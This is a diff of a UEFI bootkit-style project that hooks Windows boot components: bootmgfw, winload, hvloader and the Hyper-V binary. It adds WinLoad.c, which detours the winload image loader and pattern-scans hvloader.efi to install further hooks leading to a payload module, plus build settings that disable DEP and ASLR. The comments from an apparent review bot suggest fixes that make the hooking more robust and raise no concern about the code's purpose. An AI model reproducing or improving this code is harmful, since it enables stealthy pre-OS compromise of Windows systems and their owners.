<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>EFI Application</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>EFI Application</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<StringPooling>true</StringPooling>
|
||||
<ExceptionHandling>SyncCThrow</ExceptionHandling>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>EFI Application</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<DataExecutionPrevention>false</DataExecutionPrevention>
|
||||
<AdditionalDependencies>UefiHiiLib.lib;UefiHiiServicesLib.lib;UefiSortLib.lib;UefiShellLib.lib;GlueLib.lib;BaseLib.lib;BaseDebugPrintErrorLevelLib.lib;BasePrintLib.lib;UefiLib.lib;UefiBootServicesTableLib.lib;UefiRuntimeServicesTableLib.lib;UefiDevicePathLibDevicePathProtocol.lib;UefiDebugLibConOut.lib;UefiMemoryLib.lib;UefiMemoryAllocationLib.lib;BaseSynchronizationLib.lib;UefiFileHandleLib.lib;UefiApplicationEntryPoint.lib</AdditionalDependencies>
|
||||
<IgnoreAllDefaultLibraries>true</IgnoreAllDefaultLibraries>
|
||||
<EntryPointSymbol>EfiMain</EntryPointSymbol>
|
||||
</Link>
|
||||
<ProjectReference>
|
||||
<UseLibraryDependencyInputs>true</UseLibraryDependencyInputs>
|
||||
</ProjectReference>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<StringPooling>true</StringPooling>
|
||||
<ExceptionHandling>SyncCThrow</ExceptionHandling>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>EFI Application</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<DataExecutionPrevention>false</DataExecutionPrevention>
|
||||
<AdditionalDependencies>UefiHiiLib.lib;UefiHiiServicesLib.lib;UefiSortLib.lib;UefiShellLib.lib;GlueLib.lib;BaseLib.lib;BaseDebugPrintErrorLevelLib.lib;BasePrintLib.lib;UefiLib.lib;UefiBootServicesTableLib.lib;UefiRuntimeServicesTableLib.lib;UefiDevicePathLibDevicePathProtocol.lib;UefiDebugLibConOut.lib;UefiMemoryLib.lib;UefiMemoryAllocationLib.lib;BaseSynchronizationLib.lib;UefiFileHandleLib.lib;UefiApplicationEntryPoint.lib</AdditionalDependencies>
|
||||
<IgnoreAllDefaultLibraries>true</IgnoreAllDefaultLibraries>
|
||||
<EntryPointSymbol>EfiMain</EntryPointSymbol>
|
||||
</Link>
|
||||
<ProjectReference>
|
||||
<UseLibraryDependencyInputs>true</UseLibraryDependencyInputs>
|
||||
</ProjectReference>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="BootMgfw.c" />
|
||||
<ClCompile Include="Hvix64.c" />
|
||||
<ClCompile Include="HvLoader.c" />
|
||||
<ClCompile Include="ShitHook.c" />
|
||||
<ClCompile Include="PayLoad.c" />
|
||||
<ClCompile Include="UefiMain.c" />
|
||||
<ClCompile Include="Utils.c" />
|
||||
<ClCompile Include="WinLoad.c" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="BootMgfw.h" />
|
||||
<ClInclude Include="Hvix64.h" />
|
||||
<ClInclude Include="HvLoader.h" />
|
||||
<ClInclude Include="ShitHook.h" />
|
||||
<ClInclude Include="PayLoad.h" />
|
||||
<ClInclude Include="Utils.h" />
|
||||
<ClInclude Include="WinLoad.h" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
@ -0,0 +1,62 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="UefiMain.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="WinLoad.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="BootMgfw.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ShitHook.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Utils.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Hvix64.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="PayLoad.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="HvLoader.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="BootMgfw.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="WinLoad.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="Hvix64.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="ShitHook.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="Utils.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="PayLoad.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="HvLoader.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
</Project>
|
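--- /dev/null
+++ b/WinLoad.c
@@ -0,0 +1,43 @@
+#include "WinLoad.h"
+
+SHITHOOK WinLoadImageShitHook;
+CHAR8 ModulePathCStr[0x100];
+
+EFI_STATUS EFIAPI BlImgLoadPEImageEx(VOID* a1, VOID* a2, CHAR16* ImagePath, UINT64* ImageBasePtr, UINT32* ImageSize,
+VOID* a6, VOID* a7, VOID* a8, VOID* a9, VOID* a10, VOID* a11, VOID* a12, VOID* a13, VOID* a14)
+{
+UnicodeStrToAsciiStr(ImagePath, ModulePathCStr);
+DBG_PRINT(ModulePathCStr);
+
+DisableShitHook(&WinLoadImageShitHook);
+EFI_STATUS Result = ((LDR_LOAD_IMAGE)WinLoadImageShitHook.Address)(a1, a2, ImagePath, ImageBasePtr, ImageSize, a6, a7, a8,
+a9, a10, a11, a12, a13, a14);
+EnableShitHook(&WinLoadImageShitHook);
+
+if (StrStr(ImagePath, L"hvloader.efi"))
+{
+VOID* LoadImage =
+FindPattern(
+*ImageBasePtr,
+*ImageSize,
+HV_LOAD_PE_IMG_SIG,
+HV_LOAD_PE_IMG_MASK
+);
+
+VOID* AllocImage =
+FindPattern(
+*ImageBasePtr,
+*ImageSize,
+ALLOCATE_IMAGE_BUFFER_SIG,
+ALLOCATE_IMAGE_BUFFER_MASK
+);
+
+MakeShitHook(&HvLoadImageHook, RESOLVE_RVA(LoadImage, 5, 1), &HvBlImgLoadPEImageFromSourceBuffer, TRUE);
+MakeShitHook(&HvLoadAllocImageHook, RESOLVE_RVA(AllocImage, 5, 1), &HvLoaderBlImgAllocateImageBuffer, TRUE);
+DBG_PRINT("LoadImageHook -> 0x%p\n", RESOLVE_RVA(LoadImage, 5, 1));
+DBG_PRINT("AllocImage -> 0x%p\n", RESOLVE_RVA(AllocImage, 5, 1));
+}
+
+DBG_PRINT("[%s] Image Base -> 0x%p, Image Size -> 0x%p\n", __FUNCTION__, *ImageBasePtr, *ImageSize);
+return Result;
+}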
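Review bot: `UnicodeStrToAsciiStr(ImagePath, ModulePathCStr)` has no destination bound and `ModulePathCStr` is only 0x100 bytes, so an image path longer than 255 characters overwrites whatever follows that global; use `UnicodeStrToAsciiStrS(ImagePath, ModulePathCStr, sizeof(ModulePathCStr))`. `DBG_PRINT(ModulePathCStr)` passes the path as the format string, so any `%` in it is interpreted by `AsciiSPrint`; write `DBG_PRINT("%a\n", ModulePathCStr)`. Inside the `hvloader.efi` branch neither `LoadImage` nor `AllocImage` is checked for NULL before `RESOLVE_RVA` reads through it, so a signature miss on a slightly different hvloader build dereferences address 1 — test both and skip the `MakeShitHook` calls when either is NULL, logging which signature failed. Naming the hook `BlImgLoadPEImageEx`, identical to the winload routine it detours, also makes the `[%s]` / `__FUNCTION__` log line ambiguous; a `Hook` prefix or suffix would remove the doubt.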
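--- /dev/null
+++ b/WinLoad.h
@@ -0,0 +1,21 @@
+#pragma once
+#include "Utils.h"
+#include "HvLoader.h"
+#include "PayLoad.h"
+
+extern SHITHOOK WinLoadImageShitHook;
+
+#if WINVER == 1703
+#define LOAD_PE_IMG_SIG "\xE8\x00\x00\x00\x00\x85\xC0\x79\x45"
+#define LOAD_PE_IMG_MASK "x????xxxx"
+#elif WINVER == 1607
+#define LOAD_PE_IMG_SIG "\xE8\x00\x00\x00\x00\x48\x8B\x7D\xF7"
+#define LOAD_PE_IMG_MASK "x????xxxx"
+#endif
+
+static_assert(sizeof(LOAD_PE_IMG_SIG) == sizeof(LOAD_PE_IMG_MASK), "signature and mask do not match size...");
+typedef EFI_STATUS (EFIAPI* LDR_LOAD_IMAGE)(VOID* a1, VOID* a2, CHAR16* ImagePath, UINT64* ImageBasePtr, UINT32* ImageSize,
+VOID* a6, VOID* a7, VOID* a8, VOID* a9, VOID* a10, VOID* a11, VOID* a12, VOID* a13, VOID* a14);
+
+EFI_STATUS EFIAPI BlImgLoadPEImageEx(VOID* a1, VOID* a2, CHAR16* ImagePath, UINT64* ImageBasePtr, UINT32* ImageSize,
+VOID* a6, VOID* a7, VOID* a8, VOID* a9, VOID* a10, VOID* a11, VOID* a12, VOID* a13, VOID* a14);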
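Review bot: The `#if WINVER == 1703` / `#elif WINVER == 1607` chain has no `#else`, so any other `WINVER` leaves `LOAD_PE_IMG_SIG` undefined and the `static_assert` fails with an unrelated "undeclared identifier" error; add `#else` / `#error "no winload signature for this WINVER"` before the `#endif`. A short comment above `LDR_LOAD_IMAGE` stating that only `ImagePath`, `ImageBasePtr` and `ImageSize` are interpreted by the hook and the `a*` arguments are forwarded unchanged would document the assumption the detour in WinLoad.c depends on.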